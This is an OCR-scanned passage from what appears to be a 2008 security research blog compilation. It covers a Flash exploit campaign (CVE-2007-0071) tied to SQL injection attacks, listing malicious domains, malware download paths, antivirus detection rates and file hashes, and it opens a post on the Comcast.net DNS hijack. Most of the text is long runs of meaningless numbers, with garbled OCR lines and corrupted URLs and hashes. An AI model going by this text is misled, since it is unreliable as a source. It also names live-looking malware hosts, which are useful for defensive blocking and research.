352889 
352918148 
353092719 
353109 
353158 
353204920 
3532733 
353273301 
353306918 
353313342 
353321000 
353354579 
3533813 
353381393 
15334 


353392652 
353444 
353460171 
35352 
35352516 
353548 
353577 
353653060 
353665914 
353719690 
353810548 
35385338 
353875134 
353880734 
354014 
354083360 
354140 
354217006 
354388249 
354418035 
354476399 
3545350 
354724570 
354848 
35497310 
354980494 
355043355 
355077911 
355115351 
355255041 
355317135 
355335766 
355349 
355380999 
355496 


15335 


355551075 
355553410 
3555564 
3556052 
355629195 
355668223 
355692000 
355780125 
355804 
355811672 
355868626 
355888111 
355982813 
356001846 
356012 
356012604 
356048426 
356058012 
356075415 
356217921 
356232234 
356246123 
356339 
3563570 
356400523 
356478121 
356516807 
356822222 
356877 
356877033 
356877044 
356888258 
356994417 
357174508 
357179802 
15336 


357181330 
357221 
357248700 
357299283 
3573468 
357398 
357404821 
357409573 
357523155 
357778501 
357812351 
357880 
357888 
357922065 
357935471 
358111 
358181699 
358197 
358252504 
358399 
35841 
358456255 
358605655 
358766 
358784884 
358814325 
358823 
358864116 
358880928 
358883994 
358886 
358887149 
358896 
359148043 
359151 


15337 


359350079 
359410 
359410553 
359436010 
359454784 
359527 
359555 
359628401 
359651709 
359735704 
359803651 
359827891 
359844 
359913008 
359949017 
359956 
359961952 
360113901 
360129764 
360136943 
360262714 
360263371 
360338610 
360454453 
360591130 
360600637 
360601183 
360610595 
360686410 
360722 
360780251 
360921 
360953686 
361000 
361008033 
15338 


361023661 
361077261 
361077602 
361087 
361127901 
3611416 
36117973 
361211 
3612216 
361249319 
361344594 
361430874 
361491 
361537442 
361556 
361627121 
361796 
361888915 
361934594 
362002993 
362025741 
362080799 
362117170 
362164843 
362295225 
362453 
362491224 
362514917 
362623 
362632730 
362668034 
362737236 
362778899 
362861481 
362946192 


15339 


363133797 
363302006 
363338 
363372021 
363477885 
36353 
363530690 
363542212 
363610189 
363619554 
36363529 
363776647 
363953506 
363959 
363980131 
3641400 
364154950 
364244059 
364247798 
364290756 
36436062 
364362352 
364404298 
364427558 
364437182 
364615673 
364648 
364687324 
364764895 
364858651 
364893759 
3649017 
365221153 
36530 
36531 
15340 


365357 
365388516 
365406 
3655122 
36555336 
365588698 
3655944 
365673748 
365693785 
365765 
365859641 
365962249 
365995661 
366055 
36614100 
366165 
366179 
366190746 
366272 
366343383 
366352592 
366363 
36636326 
366681 
366724278 
366777 
366884104 
36695348 
366953482 
366992552 
366993318 
367047256 
367064307 
367090879 
367167232 


15341 


367223866 
367230610 
367420 
367468473 
367487787 
367687375 
367786615 
36782 
36788334 
367943164 
367981 
367987 
368047794 
368092688 
368104984 
368133 
368151102 
368219978 
368250909 
368278958 
368282111 
368319451 
368422765 
368570467 
368588444 
368672503 
368728458 
368734137 
368776910 
368812 
368835 
368884 
369059963 
36938 
369401786 
15342 


Onovel.com /real.js 
Onovel.com /rl.htm 
Onovel.com /Iz.htm 
Onovel.com /bf.htm 
Onovel.com /xI.htm 
Onovel.com /flash.swf 


Onovel.com /flash1.swf 


The page cannot be found 


© Gu to Minott Proshuet Sempeut Series amd perfornn a tithe search fur the words HTTP axl 
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@ Open IS Help, which is acocstble in IIS Manager (inetongr). ant search for topscs titled Wee 
Nite Setup Common \@uinitrative Tasks an! (hoot Caster Birrer Mewages 


Let’s get back to the second domain which is not returning a valid 403 error forbidden message, 
woail17.cn (221.206.20.145) which has also been sharing the same IP with kisswow.com.cn ; 
qigil11.cn ; ririwow.cn ; wowgm1.cn , among the domains used in [9]the ongoing SQL injection 
attacks. Once the binary located at woail17.cn /bak.exe was obtained and sandboxed, it 
tried to download more malware by accessing woail17.cn /kiss.txt with the following binaries 
already obtained, analyzed and distributed among AV vendors : 


1537 


369422 
369469600 
369534070 
369572668 
369636366 
369663974 
369708 
369777 
369829492 
369892562 
369922 
369937 
370012 
370028875 
370031 
370066606 
370258256 
370287475 
370325121 
370341516 
370371850 


37037371000 


370431058 
370438 
370470076 
370474838 
370523421 
3705527 
370644234 
370747871 
370842 
370848877 
370898996 
371147000 
371217 


15343 


371381671 
371414614 
371435482 
371454292 
371571664 
371638367 
371665684 
371688733 
371714036 
371827 
371936943 
371975 
372100809 
372223 
3722733 
372307186 
372355148 
372374500 
372413345 
37244263 
372458055 
372468281 
372548340 
372561353 
372604277 
372732 
372824781 
372855079 
373065658 
373203104 
373241977 
373336318 
373362220 
373456906 
373529660 
15344 


3736270 
373733773 
373735350 
3137377 
373754488 
3738059 
373808616 
373865998 
373974108 
3740044 
374026732 
374065872 
374095 
374130461 
374214681 
374215244 
374301 
374513 
374544444 
374735 
374871707 
375030642 
375225 
375358 
375375 
375381742 
375471 
37547663 
375519879 
375524103 
375670001 
375795171 
375812 
375828 
375836463 


15345 


375850244 
375945 
375969 
376011614 
376067 
376107925 
376190772 
376317 
376377519 
376487796 
376541634 
376582 
376664667 
3766663 
376666316 
376795354 
376912326 
376949161 
376995543 
377080397 
377095 
377252246 
377367312 
377373 
377383516 
3TI399777 
377412 
377532389 
377545299 
377568421 
377570 
377587766 
377711771 
3777177 
377727776 
15346 


377777866 
3777899 
377849749 
377869 
377876 
377977880 
377978 
377989975 
378105750 
378126348 
378230050 
378232190 
378234721 
378294542 
3783177 
378327 
378339 
378370431 
378383195 
378393335 
378449715 
378481390 
378615165 
3787317 
378778778 
378862257 
378981696 
378989202 
379121625 
379152267 
379188683 
379211 
379353158 
379374110 
379390758 


15347 


379440586 
379591273 
379713945 
379759009 
3797777 
379782 
379839615 
379900 
379969648 
379980702 
380000919 
38002402 
380055890 
380102 
380177260 
380187 
380198043 
380233802 
380307800 
380317346 
380344883 
38038910 
380540200 
38064 
380640280 
380675 
380927983 
380950705 
380973975672 
381128144 
381162956 
381165 
38120617 
381206175 
381225290 
15348 


381387 
381510329 
381634 
381833 
3819644 
382028534 
382038652 
382086008 
382157524 
38217626 
382220 
382336 
382382 
382502148 
382503 
382555718 
382686929 
382906 
38301911 
383055247 
383065218 
383066378 
383091334 
383158341 
3832037 
383276950 
383343785 
383422902 
383440 
38355555 
383630 
383849 
383855841 
383860656 
383874867 


15349 


384084456 
384322873 
384746394 
384756698 
384769928 
384777778 
384800905 
384823106 
384831022 
385000000 
385091 
385190717 
385269176 
385321557 
385356586 
385400 
385423244 
385585 
385628 
385831769 
385863 
385885 
385999296 
386093731 
386100 
386181604 
386368596 
386569796 
386604221 
386758993 
386760282 
386828181 
386854275 
386866785 
387060115 
15350 


387097548 
387191223 
387208 
387308 
3873337 
387361 
387386916 
387613797 
3877382 
387758242 
387772728 
387805320 
387817984 
3878957 
388002288 
388022 
388028 
388030428 
38803503 
388057851 
388073489 
388088791 
388131740 
388167434 
388366 
388383338 
388443696 
3884466 
388447031 
3884475 
388470506 
388559165 
388627 
388669955 
388695379 


15351 


388726742 
3887746 
388782226 
388824835 
388855 
389017436 
389111 
389198313 
389205166 
389219036 
389223089 
389283778 
38937777 
38944020 
38957554 
389600183 
389669038 
389681599 
389799 
389872776 
389907636 
389989058 
390004 
39001 
39002 
39003 
39004 
39005968 
3901394 
390271055 
390391 
390573 
3906034 
390647 
390785 
15352 


117276.cn /1.exe 
117276.cn /2.exe 
117276.cn /3.exe 


woail17.cn /bing.exe 


Detection rates for the exploit, the obfuscations and the malware binaries obtained : 


Sample obfuscation 

Scanners result : 3/32 (9.38 %) 

F-Secure - Exploit.JS.Agent.oa 

GData - Exploit.JS.Agent.oa 

Kaspersky - Exploit.JS.Agent.oa 

File size: 35767 bytes 

MD5...: 11d2b82a35cd37560673680f25571bac 

SHAI1..: 687066c90bb44fee5 74f2763041ee80dfee4d5bf 


A sample flash file with the exploit 

Scanners result : 2/32 (6.25 %) 

eSafe - SWF.Exploit 

Symantec - Downloader.Swif.C 

File size: 846 bytes 

MD5...: 1222bf4627894cb88142236481680d03 
SHA1..: bbf59d9e6610e6f982a7ce7fc9e9878ffd3bfe70 


The malware served 

Scanners result : 18/32 (56.25 %) 
MemScan:Win32.Worm.Otwycal.T; a variant of Win32/AutoRun.NAD 
File size: 25229 bytes 

MD5...: 6be5a7b11601f8cb06ebba08c063aa09 

SHA1..: 95d266e2e04e27a923467f483c23818c38ebel9e 


The password stealers 

Scanners result : 19/32 (59.38 %) 
Trojan.PWS.OnLineGames.WOM; Win32/TrojanDropper.Agent.NKK 
File size: 42268 bytes 

SHA1..: 7dfd51e96269f8d53354dd4c028d0c9481ebf4c8 


Scanners result : 13/32 (40.63 %) 
W32/Heuristic-159!Eldorado; Suspicious:W32/Malware!Gemini 
File size: 108172 bytes 

MD5...: a0383dd1571laf5e2f104el1f7d6df7a67 

SHA1..: be5b9b00ce9e378e545fa4fle67160f20ba82ad2 


1538 


39092 
391026403 
391089 
391184 
391301276 
391350483 
391446708 
391549613 
391557748 
391654339 
391783345 
391787217 
391799720 
391908718 
392015430 
392130244 
392134126 
392187783 
392221 
392230961 
392241593 
392247 
392285599 
392349051 
392592 
392654536 
392768791 
392846 
392905933 
3929524 
392968 
393141 
393470877 
393562367 
393605 


15353 


3936878 
393998615 
394078222 
394093022 
394265406 
394375320 
394392866 
394408350 
394489589 
394494 
39469160 
394705 
394717001 
394878 
395089635 
395137846 
395290481 
395313025 
395549027 
395835232 
395860438 
3959954 
396122221 
396256 
396298698 
396393 
396444530 
396481782 
396491215 
396527 
396531121 
396593809 
396663636 
396686 
396706 
15354 


396774397 
396777777 
396842560 
3968448 
396884204 
396966274 
397097808 
397141358 
397282 
397552941 
397611444 
397660832 
397666 
397679103 
397713 
397898706 
397908 
397937 
397989495 
397998811 
39803 
398031024 
398180232 
398222243 
398398511 
398670286 
39867115 
39869180 
398703329 
398761002 
398983521 
399114574 
399196389 
399208139 
399235602 


15355 


399267770 
399522766 
399553 
399598 
399611 
399630660 
399788 
399817552 
399928383 
3999338 
399994 
400000010 
400004 
4000040 
400004500 
400020043 
4000210 
400055569 
40007523 
400155 
400299326 
400300262 
400313087 
400346040 
400352500 
400400667 
400440330 
400440749 
400447761 
400465502 
400500800 
4005483 
400622214 
400628824 
400642310 
15356 


400666725 
400691987 
40078588 
400860400 
40100010 
401002 
401257258 
401314936 
401476806 
401482634 
401698088 
401726 
401726164 
4018433 
401843389 
401849 
40194106 
401941060 
401960 
402057 
402057789 
402100059 
402103339 
402132122 
402136 
402147639 
402240386 
4022503 
402292428 
402342016 
402365647 
402369733 
402653 
402706724 
402725 


15357 


402735970 
402961146 
403084631 
403196796 
403217056 
403286567 
403299 
403455133 
403723584 
403792721 
403798 
4038071 
403807360 
403934 
403982722 
404008480 
404019318 
404090362 
4041180818 
404180818 
404220095 
40426 
404300333 
404304 
404394230 
404400843 
404404 
404411 
404419055 
404470526 
404480271 
404540555 
404542419 
404569912 
404666 
15358 


40470697 
404734880 
4047564 
404764419 
404873386 
4049306 
4050023 
405112908 
40512195 
405222 
405225838 
405226 
405229557 
405250 
405286438 
405346 
405348355 
405502 
405596752 
405636821 
405650580 
405731128 
405974356 
40604 
406120967 
406171315 
406188 
406436044 
406719728 
406777 
406778922 
406894525 
4069213 
406931814 
4070080 


15359 


4070666 
407141714 
407164 
407307327 
407354474 
407361490 
407392609 
407405202 
407412258 
407427221 
407466214 
407481148 
407481481 
407534416 
407559377 
407656948 
4077710 
407987 
40810859 
408243 
408299 
408407 
408554422 
408594261 
408661 
4086978 
408777777 
408887771 
408888411 
408890 
409014287 
409017399 
4090222 
409143 
409233626 
15360 


40929 
409292532 
409435 
409484911 
409606861 
409648 
409662342 
409749322 
409807018 
409913074 
409925807 
40994040 
410069010 
410099229 
410113055 
410133576 
410235391 
41040010 
410575202 
41057864 
410608100 
410684326 
410700217 
410716 
410717 
410755038 
410814409 
410903424 
411007 
41111181 
4111130 
4111141 
411141181 
411241 
411303603 


15361 


411335623 
411361821 
411429393 
41146 
411460715 
411473 
4115261 
411619 
411619928 
411651225 
411658626 
411710380 
411736126 
4119304 
412006112 
412034940 
412163169 
412181 
412189988 
412205 
412270736 
4123000 
412398211 
412420482 
412426656 
4124456 
412505625 
412571 
412826686 
41286069 
412875813 
41289 
413002647 
413029 
413115665 
15362 


Consider [10]blocking flash by using Flashblock for instance, until the issue is taken care of : 


" Flashblock is an extension for the Mozilla, Firefox, and Netscape browsers that takes a 
pessimistic approach to dealing with Macromedia Flash content on a webpage and blocks ALL 
Flash content from loading. It then leaves placeholders on the webpage that allow you to click 


to download and then view the Flash content. " 


It could have been worse, as "wasting a zero day exploit" affecting such ubiquitous player such 
as Adobe’s flash player for infecting the end users with a rather average password stealer is 
better, than having had the exploit leaked to others who would have have introduced their 


latest rootkits and banker malware. 


UPDATE - 5/28/2008 


Consider blocking the following domains currently serving the malicious flash files : 


tongji123.org 


bb.wudiliuliang.com 


userl.12-26.net 


userl1.12-27.net 


ageofconans.net 


Ikjrc.cn 


psp111l.cn 


zuoyouweinan.com 


userl.isee080.net 


guccime.net 


woaill7.cn 


wuqing17173.cn 


dotall.cn 
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413137 
413161 
41322916 
413232072 
4132337 
413277882 
413357030 
413497963 
413498 
413636971 
413659511 
413689630 
413700 
413756222 
413836768 
413897263 
414001658 
414016805 
414028 
414044880 
414118717 
41414100 
4141414 
414289855 
414325 
4143254 
414411616 
41444148 
414499332 
414582338 
414585 
4146152 
414765242 
414796793 
414866 


15363 


414888476 
414888818 
415180660 
415635 
415741176 
4158158 
415860 
415904158 
416198884 
41627559 
416306606 
416314681 
416416 
416424412 
416508592 
416552 
416597405 
416605624 
416692 
416742521 
416749060 
416850 
416906019 
416920955 
416984560 
417100026 
417250511 
41728 
417303814 
417321 
417334657 
417360695 
417379584 
417508197 
417636 
15364 


417636218 
41771 
417718 
417738520 
417774 
417778584 
417832027 
417946708 
418098761 
418115 
418130090 
4182230 
418277302 
418381373 
418412100 
418423 
418428 
418495611 
418498406 
418501257 
418524915 
41853 
418690527 
418820 
418935577 
418944 
418958761 
419019 
419042381 
419055241 
419120260 
419157 
419173 
4194222 
419543771 


15365 


419662097 
419681152 
419723412 
419792158 
419818244 
419821806 
419993212 
4201006 
420152 
420166492 
420202020 
4202042 
420232035 
420243930 
42025184 
420363793 
420432879 
4204440 
420444071 
4206204 
420633 
420919079 
421014723 
421082 
4211175938 
421383 
421695 
421718990 
421736395 
421739 
421776 
421799236 
421817888 
421949351 
421997526 
15366 


422222224 
422225 
422226368 
422240006 
422287541 
422331451 
422333313 
422376926 
422454641 
422480070 
422488577 
422552525 
422605989 
422712 
422739556 
423205569 
423220375 
4233935 
423457452 
423468900 
423526634 
4235420 
423545743 
423558922 
423642 
423851 
4238608 
423901 
424114 
424207153 
424224 
424242564 
424414442 
42444222 
4244524524 
15367 


424512512 
424558 
4247028 
424706619 
424708 
424782960 
424848 
425129240 
425243772 
425300862 
425336 
42533735 
42535923 
425359233 
425448092 
425462552 
4255112 
425536341 
425783576 
425866 
425921 
425934109 
426000051 
426000647 
426130 
426164893 
426228781 
426242258 
426624 
426954764 
426970039 
427047122 
427084773 
427094 
427146319 
15368 


427183057 
427250 
427297771 
427373103 
427441611 
427508 
427543144 
42758459 
42774358 
427777777 
427949485 
428040877 
4281021 
428165 
428165418 
428175660 
428264362 
42828448 
428296 
428319419 
428385915 
428482 
428622640 
428644024 
428707209 
428785059 
428814703 
428858 
428896345 
429000163 
429014 
429037678 
429125 
429126 
429229 


15369 


429476 
429500906 
429579078 
4295886589 
429615158 
429628 
429716997 
429847302 
429882 
429888754 
430040946 
430081 
430111436 
430227 
430322 
430465144 
430467311 
430518639 
430607504 
430646 
430695219 
430751966 
430886685 
430959 
430972541 
431181957 
431259599 
431424872 
431484937 
431489127 
431498844 
431613 
431637645 
431660868 
431717599 
15370 


431743224 
431744 
4317777 
431786303 
431836630 
431903922 
431922103 
431956330 
431977 
432065641 
432091062 
43222225 
432227735 
432499762 
432555001 
432562789 
432595848 
432599966 
432689 
432851376 
432905044 
433001971 
433073521 
433163 
433223333 
433254 
43326256 
4332676 
4333014 
433330 
433337005 
433385884 
433402677 
4334377 
433594927 


15371 


4336144 
433638781 
433726 
433731 
433812 
433835211 
433886609 
433923158 
433987448 
434046379 
434055139 
434086760 
434113763 
434150050 
434200289 
434340052 
434340403 
434366666 
4344343 
434516 
434540 
434600727 
434608212 
434712435 
434998685 
435093 
435222 
435261529 
435268826 
4352723 
435298163 
435335707 
43545675 
435527 
435540 
15372 


playOnInie.com 


Onovel.com 


UPDATE - 5/29/2008 


[11]Zero day or no zero day? 
It appears that th 
e exploit used in this campaign is an already known one, namely [12] CVE-2007-0071 


’ 


and this has since been verified by multiple parties who were assessing the incident. Some 
related comments : 


[13]Flaw Watch: Why Adobe Flash Attacks Matter 


Thursday, however, Symantec backtracked after Adobe released a statement denying that 
the matter concerned a new flaw. In a progress report posted to the official Adobe PSIRT 
blog , David Lenoe said the exploit "appears to be taking advantage of a known vulnerability, 
reported by Mark Dowd of the ISS X-Force and wushi of team509, that was resolved in Flash 
Player 9.0.124.0." In an update to that blog entry, he said Symantec had confirmed that 
all versions of Flash Player 9.0.124.0 are not vulnerable to the exploits. Symantec Senior 
Researcher Ben Greenbaum acknowledged the flaw was previously known and patched by 
Adobe April 8, though the Linux version of Adobe’s stand-alone Flash Player version 9.0.124 
was indeed vulnerable to the attack. " 


[14]Potential Flash Player issue - update 

" We've just gotten confirmation from Symantec that all versions of Flash Player 9.0.124.0 
are not vulnerable to these exploits. Again, we strongly encourage everyone to download 
and install the latest Flash Player update, 9.0.124.0. To verify the Adobe Flash Player version 
number, access the About Flash Player page, or right-click on Flash content and select “About 
Adobe (or Macromedia) Flash Player” from the menu. Customers using multiple browsers are 
advised to perform the check for each browser installed on their system and update if necessary. 
Thanks to Symantec for working very closely with us over the last 2 days to confirm that this 
is not a zero-day issue, and to Mark Dowd and wushi for originally reporting this issue. " 


[15]More information on recent Flash Player exploit 

" This is not a zero-day exploit. Despite various reports that have been circulating, the Flash 
Player Standalone 9.0.124.0 and Linux Player 9.0.124.0 are NOT vulnerable to the exploits dis- 
cussed in conjunction with the previously disclosed vulnerability Symantec posted on 5/27/08. 
Symantec originally believed this to be a zero-day, unpatched vulnerability, but as their latest 
update on their Threatcon page indicates, they have now confirmed this issue does not affect 
any versions of Flash Player 9.0.124.0. " 


[16]Followup to Flash/swf stories 
"On closer examination, this does not appear to be a "0-day exploit". Symantec has up- 
dated their threatcon info, as well. We have yet to see one of these that succeeds against the 


1540 


435770 
435905 
436334048 
436423681 
436425 
436465290 
436466 
436628168 
436636232 
43664376 
436652281 
436726658 
436727138 
436735903 
436776 
436781418 
436994 
437070231 
437098055 
437206 
437424 
437493493 
437719612 
437731779 
437797486 
437840222 
438102 
438152088 
438542 
438588291 
438718267 
438784534 
438911336 
438936185 
439002185 


15373 


439086352 
439091074 
439100 
439144803 
439245251 
439483756 
439517192 
439559237 
439588935 
439662084 
4397500 
439846112 
439907452 
439985676 
440000070 
440022232 
4400438 
4400707 
4402019 
440224714 
440250 
440441012 
44046464 
440464648 
440530 
440531594 
440533963 
44057259 
440595911 
440638793 
4406399 
440650707 
4406865 
440713 
440782697 
15374 


440786 
440797241 
4408090 
440837 
440885911 
440889089 
440923655 
440939 
440973237 
441003160 
441032720 
441162863 
441212999 
441216 
441317 
441335698 
441336014 
441372646 
44139022 
441416 
441589240 
441759191 
441779894 
441860886 
441875 
441914422 
441930087 
441930427 
441983336 
4422055 
4422068 
442224377 
442371879 
442399 
4424225 


15375 


442474674 
442686125 
442733171 
442785524 
442802454 
4428447000116 
442894175 
442915 
442918 
4430068 
443050050 
443237317 
443255 
443279192 
443361155 
44339988 
4434040 
443435435 
443452314 
443459309 
443465 
443666329 
443783424 
443803611 
444000593 
44403030 
4440644 
444095934 
444111 
444190029 
4442221 
444237540 
444256255 
4442999 
44432040 
15376 


444333000 
444349 
444374 
44438338 
4444000 
444423 
444425 
4444297 
4444339 
4444345 
444440544 
444443193 
444444112 
444444222 
4444444 
44444440 
444444405 
444444455 
444444518 
444444837 
444445544 
444445555 
444445567 
444455777 
444458777 
444460057 
44446171 
444467878 
444469446 
44447 
444488770 
444496844 
444499 
4445314 
44455455 


15377 


444555 
444587 
444616244 
444633327 
444643 
44464744 
4446617 
444666000 
4446894 
4446912 
444747443 
444753 
444775559 
444779 
444848425 
44487888 
444884286 
444887737 
444908 
444944 
444973 
444979 
444989486 
445093 
445331323 
445388 
445499877 
445566755 
445574496 
445580 
445661204 
445676 
445686397 
445782963 
445821 
15378 


4458214 
445837936 
445891649 
445899 
445977807 
44600272 
446032 
446113826 
446121 
446132157 
4462364 
446288683 
446305 
446410536 
446441311 
446446 
446551261 
446649963 
4466923 
446732 
446760 
4467820 
446913 
4469699 
447084672 
44726644 
447292417 
447347 
447356127 
447400427 
4474474 
44762399 
447634 
447690401 
447690828 


15379 


447754555 
447769773 
447802 
447831006 
447925435 
4481211 
448135478 
448202293 
448253643 
448286403 
448331039 
448369472 
448388 
4484444 
44853297415 
448534 
448604036 
448845 
448930562 
448931 
448982790 
449098 
449108768 
449220248 
449261785 
449266666 
449306715 
449463822 
449476 
449479306 
44950055 
449538 
449544443 
449549057 
449693286 
15380 


4499022 
449935761 
450000230 
450062341 
450089743 
450289368 
4504055 
450420625 
450437 
450452606 
450582 
450879 
450990 
451038756 
451082839 
451152795 
451214164 
451331587 
451359037 
451432467 
451515359 
451524735 
451688642 
451692488 
451697929 
451699555 
451711340 
451983090 
452228076 
452243242 
452279 
452293048 
4523771 
4524467 
452459615 


15381 


452524901 
452545465 
452591 
452679 
453009491 
453036088 
4531114 
453143868 
453191127 
453204342 
453205953 
453340 
453379978 
453384 
453453453 
453609293 
453669562 
453681 
453708683 
453742195 
453766466 
453925791 
453926199 
453933939 
454042 
454044608 
4541554 
454233409 
454235417 
454236500 
454264446 
454301 
454342425 
454387487 
454393024 
15382 


current version (9.0.124.0), if you find one that does, please let us know via the contact page. " 


Why was the possibility of finding one that succeeds against the current version of Flash 
considered in ISC’s post? Because with no samples distributed by Symantec verifying the 
zero day, the way the exploit serving flash files were generated at the malicious domains ona 
version basis ( WIN %209,0,115,0ie.swf for instance), and with everyone trying to figure it out 
in order to obtain the malicious flash file for the latest version in order to verify its zero day 
state, this timeframe resulted in the delay of assessing the real situation. 


ttp://ddanchev. blogspot .com/2008/02/malicious-advertising-malvertising. html 


ttp://ddanchev.blogspot.com/2008/05/malware-domains-used-in-sql-injection.htm 


. http://www.symantec.com/security_response/threatcon/index. jsp 
. http://isc.sans.org/diary .html?storyid=446 


ttp://isc.sans.org/diary .html?storyid=4468 


[eps /otogeedcbe,con/poirt/2006/06 potential flash, player laoua:Wea 
_hvtp://ologs adobe.con/psirt/2008/06/potential-flash,player_ issue. ht 
Fite ore wucartepiecas cou/uia/ sed 
ttp://ddanchev.blogspot.com/2008/05/malware-domains-used-in-sql-injection.htm 
10, beep: //fiaatbteck.sozter_org] 

_neep://esvab.org/bog/"p=246 
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ttp://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-0071 


. http://www. csoonline.com/article/374013/Flaw_Watch_Why_Adobe_Flash_Attacks_Matte 


ae) 
RW 


ttp://blogs.adobe.com/psirt/2008/05/potential_flash_player_issue_u_1.htm 
. http://blogs.adobe.com/psirt/2008/05/more_information_on_recent_fla.htm 
. http://isc.sans.org/diary.html?storyid=4474 
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454511086 
454592219 
454636 
454663 
45468920 


45481818835920151013352 
45481829155920152013534 
45481847136280170411040 


454911307 
4550085 
455020243 
455031244 
455107 
455134073 
455455765 
45545916 
455483424 
455506 
455507 
455554172 
455555714 
455560956 
455602375 
455710240 
455770413 
455811300 
455835782 
455888 
456036 
4560555 
456083520 
456163244 
456209657 
456235125 
456250260 


15383 


4562549 
456271906 
4563298 
456348518 
456406963 
4564444 
45644564 
4564563 
4564569 
45649073 
456515707 
456527 
456543815 
456601 
456644323 
45665 
456727043 
456789 
456793093 
45684 
456973855 
45699868 
457098148 
4571122 
457172164 
45738981 
457821287 
457847012 
457908348 
457909076 
457914303 
457942260 
457948470 
458059288 
458099574 
15384 


458146365 
45817181 
458199362 
458224532 
45832691 
458333333 
458334484 
458373881 
458410014 
458519888 
4585987 
458811497 
458921 
458950 


4589696385 


458974751 
458977631 
459056688 
459100747 
459209170 
459380354 
459544531 
459797745 
459868093 
459884170 
460006001 
460124934 
460221169 
460238404 
460266350 
4603107 
46050555 
460534 
460535029 
460590106 


15385 


460635237 
460922484 
460926 
4609403 
460966042 
461007970 
461044087 
461093 
461164 
461174795 
461210884 
461366 
461388 
461461777 
4615597 
461976098 
4619999 
4624614 
462519450 
462535561 
462589301 
462590213 
462669012 
4627349 
462760 
462773913 
462805498 
462812660 
462874407 
4629973 
463030880 
463081347 
463321 
463333 
463535016 
15386 


463583443 
463606112 
463658248 
463697 
463768 
463989407 
464016 
46408779 
464215418 
46433 
464343 
464573208 
464584976 
4646060 
464607876 
464643 
46474647 
464747511 
464758652 
464879342 
465074 
4651651 
46518759 
465234064 
465240 
465381 
465395301 
465423077 
465449073 
465451 
465461206 
465467809 
465661571 
465715655 
465745 


15387 


465788036 
465918849 
465921777 
465960476 
465974539 
466099131 
46610102 
466179 
466204552 
466246 
466342643 
466361 
466411259 
4664184 
466459060 
466533444 
466584043 
466653662 
466759730 
466812314 
466853480 
466866 
466989 
466997474 
466999001 
46700262 
4672000 
467251927 
467279282 
467282448 
467362346 
467444422 
4675377 
467591873 
467856622 
15388 


467883794 
46791886 
468000662 
468043306 
468105 
468144742 
468290613 


4684259011 


468489599 
4686122 
468614 
468655717 
46886438 
46888864 
468913778 
468982996 
469016360 
469033593 
4690533 
4690869 
469175173 
469432 
469453585 
469524 
469586830 
469641533 
469652496 
469762864 
469811449 
469896532 
469912 
470010955 
470054916 
470181 
470286614 


15389 


470320541 
470374535 
470521013 
470667545 
470685857 
470700 
470730019 
470742324 
470793254 
470975185 
47100848 
471036362 
471095793 
471100 
471185714 
471251188 
471299 
471402278 
471477779 
471478463 
471485461 
471569 
471663312 
471681 
471701016 
4717137 
471719 
4717771 
472099056 
472288 
472397550 
472407519 
472467237 
472557186 
4725884 
15390 


472793058 
472844 
472998403 
473036333 
4731444 
473190711 
473194667 
473240123 
473289222 
473380531 
473400912 
473518951 
473597 
473632505 
4736666 
4737347 
473758144 
473833 
473999 
474222224 
474246708 
474284967 
474333733 
474404635 
47444 
474478 
474659873 
4746656 
474693526 
474747 
4748465 
474884608 
47489 
474938394 
474974 


15391 


47497663 
474976631 
475029459 
475208 
475247878 
475307805 
475362985 
475378491 
475414380 
475538693 
475561 
475634436 
475703766 
475711454 
475726780 
475735990 
475796416 
475876 
475902632 
476193 
476218621 
476330222 
476426 
476575809 
4766334 
476727130 
476738885 
476939 
477107 
477197204 
477274424 
477286684 
477312852 
4774477 
477463739 
15392 


4.5.32 Comcast.net not Hacked, DNS Records Hijacked (2008-05-30 13:31) 


Uptime for 


www.comcast.net 


Month summary Detailed downtime log 


Date 


2008-05-29 


= 
1 

2 
3 
4 
5 


From 

16:36:12 
16:25:28 
16:16:00 
15:10:07 
15:00:34 


2008-05-28 


2008-05-27 


2008-05-26 


2008-05-25 


2008-05-24 


2008-05-23 


2008-05-22 


2008-05-21 


2008-05-20 


100% 
100% 
100% 
99.71% 
100% 
100% 
100% 
100% 
99.6% 


To 

16:39:40 
16:30:06 
16:13:56 
15:13:15 


15:04:11 


Downtime 


3n 


Monitored 
18h 18m 


Check interval: 5 minutes 
IP-number: 62.121.6.136 
Total uptime: 99.99% 


Up ‘downtime 
99.92%, 31m 
100%, - 
99.99%, Sm 
99.98%, 8m 
99.99%, 3m 


Up/downtime 
100%, - 

100%, - 
99.98%, 7m 
99.98%, 6m 
99.99%, 4m 
99.99%, Sn 
99.97%, 12m 
99.98%, 10m 
99.99%, Sn 


Two days ago in a show off move, the [1]Kryogenics team managed to [2]change the DNS 
records of Comcast.net, and consequently, redirect traffic to third-party servers, which in this 
incident only served a defaced-looking like page, and denied email services to Comcast’s 


millions of email users for a period of three hours. 


The message they appear to have left at the first place, is actually hosted on third-party 


servers and reads : 


" KRYOGENIKS EBK and DEFIANT RoXed COMCAST sHouTz To VIRUS Warlock elul21 colller 


seven " 


Comcast’s changed whois records looked like this, and were restored to their original 


state approximately three hours later : 


Administrative Contact: 
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477474477 
477661252 
4777094 
477723132 
477743338 
477757902 
477771 
477777575 
477782000 
477872658 
4778774 
477883263 
477895264 
478302 
478316228 
478319991 
478329 
478333333 
478638371 
478671717 
478788971 
4788370 
478852255 
4789135 
478978162 
479003202 
4791955 
479201668 
479378784 
479433921 
479475700 
47955276 
479552762 
479705049 
4799479 
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480074 
480181219 
480244581 
480288404 
480337680 
480403786 
480465310 
480529260 
480641618 
480819371 
480830300 
480934134 
481030879 
481138839 
481164262 
481297480 
481305588 
481344025 
481364390 
48153404 
4817249 
481784715 
481904757 
481983 
482007563 
482016067 
482017705 
482139349 
482277192 
482314674 
482328069 
482452554 
4825317 
4825516 
482594823 
15394 


482633 
482717273 
482769972 
482809713 
482966436 
483056320 
483203350 
483238330 
483243854 
4833348 
483444 
483579174 
48361621 
483618 
484043 
484086708 
484151994 
484171230 
484262045 
4842805 
484347845 
484350344 
484429376 
4844444 
48444464 
484463 
484471371 
484544486 
484588888 
484790 
484848484 
48484884 
48492580 
484933596 
484942566 


15395 


485085508 
4851411 
48514114 
485331800 
485417 
485421 
4855587 
485734806 
485740242 
485750749 
485754833 
485885115 
485942675 
486266456 
486416871 
486433 
486494112 
486626408 
486716 
486726327 
486775 
486944305 
487062024 
48707 
487270909 
48745 
487454418 
4874787 
4875051 
487555788 
487695 
487759013 
487773334 
487777748 
487777778 
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487826724 
48799755 
488028989 
488157 
488183 
488192 
488268646 
4883067 
488341 
488344166 
488348 
488513 
488521988 
4888880 
48888881 
488888894 
488990169 
489068567 
489273 
489385956 
489436660 
489452 
489588664 
